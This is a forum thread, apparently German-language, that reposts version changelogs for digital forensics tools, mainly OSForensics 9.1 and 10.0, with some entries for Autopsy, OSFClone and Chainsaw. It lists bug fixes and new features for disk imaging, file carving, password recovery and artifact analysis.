    When downloading large videos the connection to remote server could end with windows error 10060 (connection drop) and/or 10054 (server terminate connection). Previous behaviour: OSForensics reported failed download. Now if OSForensics detects the download is because of above errors, it try attempt to retry the download (the download should continue where it left off). If it fails three (3) times, it will ask user if they want continue to retry or stop.

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1005
Beitrag von: SiLæncer am 21 Dezember, 2021, 10:00
Changelog

    Create / Search Index
        New indexer builds with updated support for APFS
    File Name Search
        Recognizes JSON (*.json) and Event Log (*.evtx) files and open them with internal viewers
    JSON Viewer
        Added support to parse Google Chat record exported from Google Takeout service
        Can parse a single "messages.json" JSON format file or select to parse multiple files at once
        Same as the Hangouts, it shows the conversations in HTML with formatted chatting app-like style
        Fixed right-click Add to case menu, users can choose KML/GPX/CSV formats when adding selected items to case
    Manage Case
        Updated USB write-block message to differentiate when enabling and disabling the setting
    Raw Disk Viewer
        Fix handling of clusters for APFS "cloned" inodes that share clusters with other inodes

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1006
Beitrag von: SiLæncer am 23 Dezember, 2021, 11:00
Changelog
       
    Case Manager
        Added option to "Add to Case" when right click on multiple tagged items. OSForensics will add tagged files but warn and provide a list of tagged items that are references (e.g. artifact found within a database) that could not be added to case.
    Device Manager
        Added support for detecting hidden file systems via on entire disk images. This allows for recovery of deleted partitions (depending on what remnants are left on disk)
    System information
        Updated hardware support to correct report on DDR5 RAM and Intel 12th Gen CPUs with efficiency cores and performance cores
    Password Recovery
        Fixed bug causing columns in list view to disappear after user has configured the active columns, when a new case is loaded
    Misc
        For some modules that allow user to configure columns orders, added a "Defaults" button to allow user to reset the columns to OSF's default settings
        Added the Microsoft DLL, msvcp140_codecvt_ids.dll to installer as it is required by translate.exe, which is in turn used for viewing Word documents. But the DLL is missing in Win 7. The codecvt_ids DLL converts characters between different character sets.

[close]

http://www.osforensics.com/
Titel: Autopsy 4.19.3
Beitrag von: SiLæncer am 27 Dezember, 2021, 22:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    Bug Fixes:

    Updates for log4j vulnerabilities.
    Solr 8.11.0 Upgrade
    Manual update of log4j to 2.16.0

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.1.1007
Beitrag von: SiLæncer am 24 Januar, 2022, 19:00
Whats new:>>

    Case Manager:

    Support for adding recovered partitions to case

    Misc:

    Refresh physical disk info only when there is device change notification, to reduce costly re-scanning of physical disks
    ?Keep single instance of physical disk info shared between all modules

http://www.osforensics.com/
Titel: OSForensics 9.1.1008
Beitrag von: SiLæncer am 27 Januar, 2022, 11:01
Whats new:>>

    Disk Image and Filesystem Support
    Fixed HFS+ partitions being incorrectly identified as ext2

http://www.osforensics.com/
Titel: OSForensics 9.1.1009
Beitrag von: SiLæncer am 03 Februar, 2022, 11:00
Changelog


    Case Management:

    Fixed possible crash (crash was due to uncaught exception from MoveFile failure) when changing the case location in the Edit Case Details dialog when paths are longer than MAX_PATH

    Deleted Files:

    Cleaned up text/message for the Save Checked Deleted Files confirmation dialog
    Direct Image Access / Filesystem support
    NTFS, fixed bug in traversing $I30 entries in directories spanning multiple MFT records

    File Name Search:

    Enabled "Show $FILE_NAME Dates (NTFS)" configuration option automatically if any of the $FILE_NAME columns are selected when configuring displayed columns
    Fixed bug where the custom case directories a user can specify in the config settings did not get reset when switching between cases

    File System Browser:

    Fixed issue of FSB starting in extremely minimized state. Issue was caused if previous instance of FSB was minimized when closed. Now if closed while minimized, FSB will not save existing dimensions and reuse the last saved values

    File Viewer:

    Fixed bug where OSF crashed when trying to retrieve file info from a file that does not exist
    Fixed bug where if 'save file' option is used on a HFS file system and with 2 or more files selected, the saved file name was incorrectly output

    Mismatch Files Search:

    Updated help file to add more detail on how 'Filter Types' is used
    Fixed Chrome/Firefox Cache image exclusions (caches were in different places than expected, e.g. for Firefox, it is different based on OS)

    Search Index:

    Fixed bug where displayed sort options did not match function (email + attachments)

    Signatures:

    Will now clear create signature config (output type, hashes, etc) each time a new case is loaded

    User Activity:

    Fixed bug where all USB entries weren't displayed unless the "event log" option was selected as well
    Will now clear user activity config (date range etc) each time a new case is loaded

    Misc:

    Decreased the size of the Deleted Icon (X) overlay over image thumbnails
    Added .emlx to email pre-sets where used

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1010
Beitrag von: SiLæncer am 24 März, 2022, 09:00
Changelog


    Boot VM

        Added more verbose debug logging when obtaining privileges to mount a registry hive
        Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected

    Disk Image and Filesystem Support

        Fixed reading of volume bitmap failure due to sector unaligned access
        APFS, fixed bug causing buffer overflow when reading extended attributes (eg. compressed files)
        APFS, fixed reading compressed file data for files with hard links
        APFS, fixed bug in decompressing zlib-compressed file data
        APFS, fixed reading of lzvn-compressed file data with updated implementation
        HFS+, fixed bug in decompressing zlib-compressed file data
        HFS+, support for reading lzvn-compressed file data stored in resource fork

    File Hashing

        NSRL import, the latest hash set (2.75 Dec 2021) contains an invalid character that was stopping the import from running correctly, this has now been fixed

    Help

        Added the FireFox/Chrome cache directories that are excluded when using the Chrome/Firefox exclude image cache file options in the Files Mismatch module

    Password Recovery

        Fixed issue with browse dialog not accepting multiple files correctly

    Screen Capture

        Fixed GDI handle leak when drawing button. This caused a leak when drawing windows containing the Screen Capture button (eg. internal viewer)

    Search Index

        Fixed file handle leak
        Fixed GDI handle leak
        Fixed a bug that could occur on the off-chance that system time is the same for two searches

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1011
Beitrag von: SiLæncer am 04 April, 2022, 06:00
Changelog


    Device Manager:

    Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with large amount of unpartitioned space

    Subscription:

    Fixed crash when checking subscription validity

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1012
Beitrag von: SiLæncer am 06 April, 2022, 09:22
Changelog


    File system support:

    exFAt, removed check for volume attribute bit when traversing file entries, which appears to be set in macOS created volumes (which casued file sizes to appear as 0 and some directories to be hidden)

[close]

http://www.osforensics.com/
Titel: OSFClone 1.3.1001
Beitrag von: SiLæncer am 12 April, 2022, 10:30
(https://i.postimg.cc/hG4zpJWz/screenshot-1643.png)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to use quickly and efficiently their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Whats new:>>

Updated Porteus Linux to V4.0 (Base Image, Porteus-XFCE-v4.0-x86_64.iso)

http://osforensics.com/tools/create-disk-images.html
Titel: OSForensics 10.0 Beta 1
Beitrag von: SiLæncer am 10 Juni, 2022, 19:00
Changelog


    Boot VM:

    Will now display a proper error message when booting from VirtualBox failed (eg. when Intel VT-x/AMD-V is not enabled)
    Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected
    Added check and display error for partition-only images without a supported OS before mounting as physical disk
    Added support for password bypass for Win 10/Server 2016 Builds 17763 and 19041 (via PEPassPass v1.2.3)

    Case Manager:

    Support for adding recovered partitions to case
    Added ability to save and load custom templates for evidence categories
    Added ability to rename case devices after they have been added
    Add Device, changed the default display name to include the date the shadow copy was taken.
    Report Generation, separated the HTML and PDF report options into different templates, no longer need to generate a HTML report to get a PDF copy
    Report Generation, added the details of OSFOrensics digital signature to generated reports
    Report Generation, updated "Link to case files" and "Copy files to report location" options to "Create Redacted Report" and "Create Full Length Report" to be more descriptive
    Report Generation, added ability to toggle the inclusion of signature certificate verification information in report generation dialog
    Report Generation, Added "Software Verification" link in report sidebar
    Report Generation, Added certificate verification information to non HTML reports
    Clipboard Viewer / ThumbCache Viewer:
    Will now draw checkerboard background for improved display of transparent images
    Improved drawing of images to reduce flickering

    Deleted Files:

    Updated to allow selecting of carving of MFT Only, MFT and Carving, or Carving Only
    MFT and Carving now enabled by default
    Added minimum size requirement for carved JPGs (126 bytes), GIFs (43 Bytes), PNGs (68 bytes)
    Changed name Plist to Binary Plist and improved detection to limit false positives
    File carving, fixed possible crash when carving MP3 files
    File carving, improved MP3/JPG detection to cut down on the number of false positive results returned
    Added secondary sorting on second column (via dropdown and/or control click on details tab)
    Disabled sorting while deleted file scan is in progress
    Lowered priority level of carving threads to improve response from computer when carving is in progress
    Thumbnail Tab, added a quality level indicator to the thumbnails preview
    Added support for carving MFT file records on non-NTFS quick formatted volumes
    Added support for recovering files from carved MFT records. This enables recovery of files from a quick-formatted volume
    Added new scan method to config window, changed dropdown box to checkboxes.
    Prepend "Carved MFT" to 'Source String' of files recovered from carved MFT records to differentiate from normal deleted files
    Added check for large buffer sizes before allocating memory when detecting faces
    Background LED indicator fixed, indicator would incorrectly reset after "Saving Delete File to Disk" while scan is running.
    File carving, optimization, improved efficiency of pattern matching code. This change roughly doubles the speed of file carving.
    File carving, optimization, updated extensions with header signature. Changed empty buffer detection to faster implementation to detect empty or repeating blocks read from disk. Scanning empty sectors is now 6 times faster
    File carving, optimization, improved the responsiveness for OSForensics when carving is running
    File carving, optimization, increased the number of carving threads to 75% of available logical processors, up to a max of 32
    File carving, improved carving of HTML files
    File carving, reduced false positives for FLV files
    File carving, changed the naming of file to be more informative, new format "Carved .JPG file found at 310GB - byte offset 0x482D709C00.jpg"
    File carving, better handling of .eml files (will verify that both "From:" and "Date:" field are present
    File carving, reduced repeated carving for file signatures with the same headers (e.g. TIFF family, ZIP family).
    File carving, ensure recovered carved file will not exceed the max file size specified by extension (or 100 MB, whichever is less)
    Opening internal viewer for Plist Files from within the deleted files module should now work
    Further optimizations to file carving. Improved accuracy for JPG files and overall performance. Compared to final V9 release, current file carving code is over 6x faster (benchmarked with an Mac E01 disk image with default carving config)

    Device Manager:

    Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with large amount of unpartitioned space

    Disk Image and Filesystem Support:

    HFS+, preliminary support for compressed files
    HFS+, fixed bug in decompressing zlib-compressed file data
    HFS+, support for reading lzvn-compressed file data stored in resource fork
    APFS, fixed bug causing buffer overflow when reading extended attributes (eg. compressed files)
    APFS, fixed reading compressed file data for files with hard links
    APFS, fixed bug in decompressing zlib-compressed file data

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1000
Beitrag von: SiLæncer am 14 Juli, 2022, 13:00
Changelog

       
    Auto Triage
        Added option to enable running auto triage automatically on startup, which can be enabled in the install to usb dialog and use settings last set
        Added splash screen and progress bar when running auto triage as a standalone option
    Analyze Shadow Copy
        Added ability to find shadow copies from analyze dialog without adding to case first
    Boot VM
        Will now display a proper error message when booting from VirtualBox failed (eg. when Intel VT-x/AMD-V is not enabled)
        Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected
        Added check and display error for partition-only images without a supported OS before mounting as physical disk
        Added support for password bypass for Win 10/Server 2016 Builds 17763 and 19041 (via PEPassPass v1.2.3)
    Case Manager
        Support for adding recovered partitions to case
        Added ability to save and load custom templates for evidence categories
        Added ability to rename case devices after they have been added
        Add Device, changed the default display name to include the date the shadow copy was taken
        Added time zone names to time zone drop down and case report
        Report Generation, separated the HTML and PDF report options into different templates, no longer need to generate a HTML report to get a PDF copy
        Report Generation, added the details of OSFOrensics digital signature to generated reports
        Report Generation, updated "Link to case files" and "Copy files to report location" options to "Create Redacted Report" and "Create Full Length Report" to be more descriptive
        Report Generation, added ability to toggle the inclusion of signature certificate verification information in report generation dialog
        Report Generation, Added "Software Verification" link in report sidebar
        Report Generation, Added certificate verification information to non HTML reports
    Clipboard Viewer / ThumbCache Viewer
        Will now draw checkerboard background for improved display of transparent images
        Improved drawing of images to reduce flickering
    Deleted Files
        File carving, optimization. Improved accuracy for JPG files and overall performance. Compared to final V9 release, current file carving code is over 6x faster (benchmarked with an Mac E01 disk image with default carving config)
        File carving, optimization, updated extensions with header signature ????ftyp to \x00\x00\x00?ftyp instead. Changed empty buffer detection to faster implementation to detect empty or repeating blocks read from disk. Scanning empty sectors is now 6 times faster
        File carving, optimization, improved efficiency of pattern matching code. This change roughly doubles the speed of file carving
        File carving, optimization, improved the responsiveness for OSForensics when carving is running
        File carving, optimization, increased the number of carving threads to 75% of available logical processors, up to a max of 32
        For FAT and NTFS files systems, added option to carve only Allocated sectors
        Updated to allow selecting of carving of MFT Only, MFT and Carving, or Carving Only
        MFT and Carving now enabled by default
        Added minimum size requirement for carved JPGs (126 bytes), GIFs (43 Bytes), PNGs (68 bytes)
        Changed name Plist to Binary Plist and improved detection to limit false positives
        File carving, fixed possible crash when carving MP3 files
        File carving, improved MP3/JPG detection to cut down on the number of false positive results returned
        Added secondary sorting on second column (via dropdown and/or control click on details tab)
        Disabled sorting while deleted file scan is in progress
        Lowered priority level of carving threads to improve response from computer when carving is in progress
        Thumbnail Tab, added a quality level indicator to the thumbnails preview
        Added support for carving MFT file records on non-NTFS quick formatted volumes
        Added support for recovering files from carved MFT records. This enables recovery of files from a quick-formatted volume
        Added new scan method to config window, changed dropdown box to checkboxes
        Prepend "Carved MFT" to 'Source String' of files recovered from carved MFT records to differentiate from normal deleted files
        Added check for large buffer sizes before allocating memory when detecting faces
        Background LED indicator fixed, indicator would incorrectly reset after "Saving Delete File to Disk" while scan is running
        File carving, improved carving of HTML files
        File carving, reduced false positives for FLV files
        File carving, changed the naming of file to be more informative, new format "Carved .JPG file found at 310GB - byte offset 0x482D709C00.jpg"
        File carving, better handling of .eml files (will verify that both "From:" and "Date:" field are present
        File carving, reduced repeated carving for file signatures with the same headers (e.g. TIFF family, ZIP family)
        File carving, ensure recovered carved file will not exceed the max file size specified by extension (or 100 MB, whichever is less)
        Opening internal viewer for Plist Files from within the deleted files module should now work
        NTFS, fixed potential memory issue when restoring deleted files
        NTFS, added more debug verbosity when restoring deleted files to disk
    Device Manager
        Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with large amount of unpartitioned space
    Disk Image and Filesystem Support
        HFS+, preliminary support for compressed files
        HFS+, fixed bug in decompressing zlib-compressed file data
        HFS+, support for reading lzvn-compressed file data stored in resource fork
        APFS, fixed bug causing buffer overflow when reading extended attributes (eg. compressed files)
        APFS, fixed reading compressed file data for files with hard links
        APFS, fixed bug in decompressing zlib-compressed file data
        NTFS, fixed bug in incorrect file being opened due to hash collision
    E-mail Viewer
        Message body containing inline content (eg. base64-encoded jpgs) now displayed as attachments
        Thumbnail preview for supported image attachments on mouse over
    ESEDB Viewer
        Viewer now displays when binary data has been found
        Search now looks for ASCII strings present in binary data fields
    Event Log Viewer
        Added "Device Connected/Disconnected" option to the filter preset list
    File Name Search
        Added Hash Set column which identifies which hash set the file was located in
        Fixed $FILE_NAME dates not being displayed for entire disk images added to case
        Added a reset button to config dialog which sets all changes made by user back to their defaults
        Made several popup dialogs to close when 'esc' is pressed
        Now using ffmpeg library instead of exiftool for counting video tracks for better performance
    Forensic and Cloud Imaging
        Rebuild RAID Disk, added support for detecting and rebuilding Linux mdadm RAID using superblock v1.X
        Forensics Copy, added ability to export forensic image as zip file
    Internal Viewer
        Perform initialization/shutdown of Media Foundation once rather than for every internal viewer instance
        Fixed issue that prevented deleted files opened from File System Browser from showing in the File Viewer
        Fixed incorrect thumbnail being draw for current item, after the list is updated
        Migrated library for media playback from Windows Media Foundation to ffmpeg
        Added support for playing media from memory buffer sources (eg. deleted files)
        Will now display a specific error message when attempting to open media file with corrupted attributes (duration, video pixel format, etc)
        Fixed flickering from redrawing thumbnails from deleted search result
        Automatically rotate videos if rotation metadata available
        Added a check to only redraw thumbnails if the items changed
        Metadata, display an error message if exiftool executable was not found
        Fixed multithreading bug causing media playback issues when opening multiple instances of the same file
        Fixed video paint issues when resizing window
        Fixed first video frame occasionally being displayed immediately after loading preview thumbnail images
        File viewer support, added opening deleted files (image, video/audio, android backup, compressed archive, office files)
        Added right-click menu support for deleted files
    Install to USB
        Fixed bug, files required by the web browser module were not being copied
    Localisation
        Added localisation support for Korean, Chinese (simplified and traditional), Japanese, Spanish, German and French
    Mismatch File Search
        Separated default and user-created filters, removed "built-in" text
    OSForensics Digital Signature Verification
        Added button to start screen (in housekeeping section) that verifies the integrity the program and displays a dialog with the information. Equivalent to going to the properties for the OSF executable, going to the digital signatures tab and clicking the details of the signature to verify the digital certificate is valid
    Password Recovery
        Fixed decrypting of wifi passwords on some machines due to a bug in PBKDF2 algorithm
        Updated common passwords dictionary with passwords obtained from more recent data breaches, increased number of unique passwords from ~10,000 to ~2.3 Million
        Fixed password recovery issue with the records in "Windows.old" folder
        Fixed crash in ZIP password recovery when testing a single password
    Search Index
        Fixed GDI handle leak
    SQLite Browser
        New Tab to shown Unallocated Space (Free Pages/Blocks) within SQLite database file
        Fixed bug to address possible circular reference/offset when parsing corrupted/bad free blocks
        Added Run SQL tab, allows users to write their own SQL statements
        Updated sqlite source files from 3.8.11.1 to V3.38.0
    Start Window
        Added settings option to allow for selecting language in use
    System Information
        Added partition selection dialog when scanning whole disk image with multiple partitions
        Added category for basic system information collection from non Windows machines
    Thumbnail Cache / Viewer
        Attempt to generate video file thumbnails if file extension is a known video type
        Attempt to load thumbnails only if the filename has a known file extension
        Set maximum thumbnail cache size of 2000 to prevent exceeding GDI handle limit
        Fixed multithreaded handling of video thumbnail generation using Media Foundation
        Fixed thumbnail icons not appearing in thumbnail view
        Added check for large buffer sizes before allocating memory for displaying thumbnails
        Migrated library used for video thumbnail generation from Windows Media Foundation to ffmpeg
        Fixed pixelated play icon for video thumbnails
    User Activity
        Added Cortana history category. Finds reminders, events, contacts and search history as well as location at time of creation
        Added "Create Super Timeline" button that performs a complete scan of all activity sub-categories
        USB timeline, added support to collect USB Artifacts of USB storage device connection and disconnection history. This feature is achieved by analyzing event ID 1006 (from Microsoft-Windows-Partition%4Diagnostic.evtx) and event IDs 2003 and 2012 (Microsoft-Windows-DriverFrameworks-UserMode/Operational channel). Event logging of the later channel is not enabled by default, users / system administrators need to have enabled it in the past in order for OSF to collect the relevant events
        Added parsing for Linux log files located in the /var/log directory
        Passwords, added an option to scan "Windows.old" folder which stores the backups of the previously installed Windows, this option is enabled by default and can be disabled from the Config dialog
        Fixed an issue where Moved Downloads not recognizing the system drive on live acquisition mode
        Added browser artifact support for some modern versions of Linux
        MRU, shortcut Files, will prompt users if they would like to open the .lnk file itself if the target file/directory is no longer available
        Added warning when attempting to scan a drive image that does not exist
        Shellbag, fixed possible heap corruption crash when parsing (corrupted) URI shell item
        Added check and warning message for missing case device when starting scan
    Web Server Log Viewer
        Added menu for filtering for common web exploits such as SQL injections
    Misc
        Refresh physical disk info only when there is device change notification, to reduce costly re-scanning of physical disks
        Keep single instance of physical disk info shared between all modules
        Fixed bugs with some MessageBoxes opening to wrong handle
        Changed some dialogs to close when 'esc' is pressed and centred others
        Installer, added language selection when running installer
        Rearranged some ok/cancel buttons for consistency, fixed up some out of place buttons/controls
        GPUSupport DLLs, changed the runtime library for them to /MT instead of /MD to avoid a missing VC runtime error on older Windows systems
        Centred some dialogs to main window for consistency
        Help file, updated file carving config info + images
        UI adjustments, centred additional dialogs
        Installer, updated OSFMount to v3.1.1001
        Installer, added Japanese language selection option
        Removed "Selected items" option from the right-click menu for consistency. Affected modules include JSON Viewer, ThumbCache Viewer, Web Server Log Viewer
        Updated DirectIO driver used for system information collection to work with Win11 22H2 release

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1001
Beitrag von: SiLæncer am 22 Juli, 2022, 09:15
Changelog

       
    Localisation
        UI adjustments for localisation
        Added some missing strings to localisation
    OSFMount
        Updated OSFMount files to fix driver and program version mismatch
    User Activity
        Increased event info string size to avoid overflow
    Volatility Workbench
        Updated Volatility tool from "3 1.0.1 - beta" to "3 2.0.1"
        Added new volatility commands to volatility workbench

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1002
Beitrag von: SiLæncer am 05 August, 2022, 13:00
Changelog

       
    Create / Search Index:

    Fixed crash when saving and loading index configurations

    File System Browser:

    Fixed file entries not appearing in Details/List View in Win 7

    Install to USB:

    Added config link to adjust auto triage options in USB install window

    Localisation:

    Further UI adjustments for localisation

    Start Window:

    Fixed filename bug when opening a file directly from the start window (registry, email, etc) where the filename could be random text or not open correctly

    ThumbCache Viewer:

    Fixed thumbnails not appearing in List View in Win 7

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1003
Beitrag von: SiLæncer am 09 August, 2022, 19:00
Changelog

       
    Auto Triage:

    Fixed crash in Auto Triage > Logical Image Configuration when selecting Peer 2 Peer option (pattern string length was too long)
    Fixed crash in Auto Triage > Password recovery

    Password Recovery:

    Fixed windows login passwords not scanning when using live acquisition

    User Activity:

    Fixed bug when trying to re-order columns for USB items that would cause the columns to disappear until OSF was restarted

    User Interface:

    Mitigated Window drag lag (effect was more prominent with mouse using with high polling rates (>300/s))

    Misc:

    Fixed issue with OSF not validating some key.dat files because of extra lines in the file

[close]

http://www.osforensics.com/
Titel: OSFClone 1.4.1000
Beitrag von: SiLæncer am 15 September, 2022, 09:04
(https://i.postimg.cc/hG4zpJWz/screenshot-1643.png)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to use quickly and efficiently their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Whats new:>>

    Updated Porteus Linux to V5.0 (Base Image, Porteus-XFCE-v4.0-x86_64.iso)
    Updated libewf to 20220831 (included libsmdev-20220716)
    Updated afflib to 3.7.19

http://osforensics.com/tools/create-disk-images.html
Titel: OSForensics 10.0.1004
Beitrag von: SiLæncer am 27 September, 2022, 06:30
Changelog

       
    Case Management:

    Reporting, increased PDF report generation timeout
    Reporting, added a progress window when exporting report as a PDF
    Devices, added support for BDE volumes with a clear key

    Create Index:

    Fixed bug where if multiple folders/unallocated are added, the indexers fails to run

    Deleted Files:

    Fixed crash when carving MFT records on disks without valid file systems

    Email Viewer:

    Added checkbox option to search for attachment filenames

    Password Recovery:

    Added an error message and retry option if Chrome local state file was locked (triggered if using Chrome to login into a site or switch profiles at the same time as running a scan in OSF)
    Now clearing file system cache before performing scan. This is to fix issues due to inconsistent data when scanning live system drives in Forensics Mode
    Fixed a failure to decrypt passwords due to unnecessary encoding/decoding operations of the keys when scanning Browsers passwords. This caused incorrect AES key and key length returned which caused the failure
    Decryption and Password Recovery, made a change so that the number of available GPUs is not checked until clicking on the tab (previously it would happen at OSF startup and could cause a crash if GPU drivers are out of date)
    Fixed bug where scan was being preformed on Live system regardless of which drive was selected

    Rainbow Tables:

    Fixed bug where 'recover passwords' button did not resize properly after recovery is completed/cancelled

    Start Page:

    Added icon and button to display USB write blocking current setting, displayed as "USB Write: Enabled" or "USB Write: Disabled", and can be toggled on and off using this button (current case setting will be changed)

    User Activity:

    Now clearing file system cache before performing scan. This is to fix issues due to inconsistent data when scanning live system drives in Forensics Mode
    Fixed a failure to decrypt passwords due to unnecessary encoding/decoding operations of the keys when scanning Browsers passwords. This caused incorrect AES key and key length returned which caused the failure

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1006
Beitrag von: SiLæncer am 28 November, 2022, 11:00
Changelog

       
    E-mail Viewer:

    Fixed Ctrl+J jump to message shortcut not working
    Create / Search Index
    New indexer builds
    Fixed email indexing issue with delimiter character

    Internal Viewer:

    Metadata, allow the user to manually extract EXIF data For large files that need to be saved temporarily on disk
    Ffmpeg, fixed pts-related bug affecting certain video files (eg. mjpeg/Microsoft PCM)
    Images, added file size limit for reading to buffer when using libheif

    Misc:

    Replace file size limit with warning prompt when creating temporary copy of a large file

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1007
Beitrag von: SiLæncer am 23 Januar, 2023, 19:00
Changelog

       
    Boot VM:

    Fixed error booting MacOS image on VirtualBox for some systems
    Added a check to prevent user from adding VM to case if a case is not open

    Case Management:

    Reports, added option to have a minimum font size when exporting report as PDF
    Increased font sizes for better readability when exporting as PDF
    Reports, added checkbox for case report dialog "Include thumbnails" to allow thumbnails to be enabled/disabled. It can be useful to disable thumbnails for reports with thousands of images otherwise they may not open correctly in a web browser

    Deleted Files:

    Fixed possible crash when looking up carved files in hash set

    Email Viewer:

    Fixed bug when exporting PST emails to list. The TO, CC, and BCC fields were not cleared between emails

    Internal Viewer:

    Ffmpeg, fixed ffmpeg library error by re-arranging load order of DLLs (previously could display a “Failed to load library” error at OSForensics start-up)

    Mobile Artifacts:

    Fixed bug with exporting SMS to CSV/Text where Sent/Received field was displaying only received
    Fixed bug with exporting SMS to CSV/Text where selected checked items were not being exported correctly. The export was incorrectly using fixed GUI list position index and not the internal list indexes

    Password Recovery:

    Fixed some possible crashes that could occur

    User Activity:

    Fixed possible crash when scanning MRU

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1008
Beitrag von: SiLæncer am 22 Februar, 2023, 10:00
Changelog

       
    File Carver:

    Fixed possible crash during carving when verifying carved images with GDI

    USB Install:

    Fixed crash when trying to create a USB install with all checkboxes selected

    Misc:

    Fixed ffmpeg library loading warning on machines with Visual C++ Redistributable not installed

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1009
Beitrag von: SiLæncer am 23 Februar, 2023, 11:00
Whats new:>>

    Updated WinPEBuilder for ffmpeg support in WinPE
    Fixed signing issue with previous build

http://www.osforensics.com/
Titel: OSForensics 10.0.1010
Beitrag von: SiLæncer am 26 April, 2023, 11:00
Changelog


    Case Manager:

    Fixed tagged files not being saved to the case due to incorrect duplicate file check

    Hash Set:

    Fixed bug with exporting CSV files, category was not being exported in the CSV
    Updated example export output in Help

    Install to USB:

    Fixed bug when Installing OSForensics to USB drive with an old version subscription key, it may wipe the current license from the local install

    Raw Disk Viewer:

    Add support for ext4 64-bit feature

    System Information:

    Fixed crash when “Live Acquisition - Current Machine” is selected for the scan and “Basic System Information” command is selected

    Web Browser:

    Fix bug where OSF may fail to add downloaded video file to case

    Misc

    Updated VolatilityWorkbench to V3.0.1004

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1011
Beitrag von: SiLæncer am 12 Mai, 2023, 21:00
Changelog


    ESEDB Viewer:

    Fixed a bug where Windows.edb file could not be loaded from an image file
    Changed the selecting custom Windows.edb file behavior to make the Windows.edb filepath as the initial directory

    Logical Image - Android Copy:

    Fixed possible crash during imaging due to long file names/extension

    Program Artifacts:

    Fixed parsing of the prefetch files for windows 10 builds 1903 and newer to collect the correct run count

    Report Generation:

    Fixed issue where all 'Exported Files' were added to every 'Category' section
    Enabled hiding of thumbnails for PDF reports
    Fixed issue where options was not disabled for certain report options

    Misc:

    Fixed issue with hover text not displaying properly on toolbar icons (Script Player & SQLite Browser)
    Fixed issue where email files and BitLocker files could not be read in Forensics mode

[close]

http://www.osforensics.com/
Titel: OSForensics 10.0.1012
Beitrag von: SiLæncer am 16 Mai, 2023, 10:00
Whats new:>>

Fixed issue where all 'Photos of Acquired Evidence' were added to every 'Category' section

http://www.osforensics.com/
Titel: OSForensics 10.0.1013
Beitrag von: SiLæncer am 26 Mai, 2023, 21:00
Changelog


    File Viewer/File Name Search:

    Added MSVCP140.dll and vcruntime140.dll to fix missing system file issue that could happen when opening docx files and filtering on EXIF metadata in some Windows 11 builds

    Manage Case:

    Fixed issue where USB write block was not being enabled/disabled

    Start Page:

    Fixed issue where 'USB Write: Enabled/Disabled' icon text was not updating in custom workflows
    Fixed issue where 'USB Write: Enabled/Disabled' text was written onto the wrong icon

[close]

http://www.osforensics.com/
Titel: Chainsaw 2.6.2
Beitrag von: SiLæncer am 03 Juni, 2023, 09:30
(https://i.postimg.cc/fywgtSMD/screenshot-2299.png)
Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

License: GPLv3

Changelog


v2.6.2 Latest

This release contains the following changes of note:

    Adds array indexing support to key identifiers (tau-engine), which also fixes some chainsaw rules...

v2.6.1

This release contains the following changes of note:

    Fix hunts not running on .jsonl files
    Bring in some false positive reduction for the default Sigma rules mapping file

[close]

https://github.com/WithSecureLabs/chainsaw
Titel: OSForensics 10.0.1014
Beitrag von: SiLæncer am 14 Juni, 2023, 19:00
Whats new:>>

    Create index:

    Added mp4 and mv4 to default video formats
    Fixed detecting UTF-8 text files without a BOM

http://www.osforensics.com/
Titel: Chainsaw 2.7.0
Beitrag von: SiLæncer am 03 Juli, 2023, 19:30
Whats new:>>

    This release contains the following changes of note:

    Add cache to disk support for JSONL output
    Add file path to CSV output
    Fix for newline output issue in tabluar output
    Rule loading warnings should highlight output as a warning
    Tweaks and improvements to mappings and rules

https://github.com/WithSecureLabs/chainsaw
Titel: Chainsaw 2.7.1
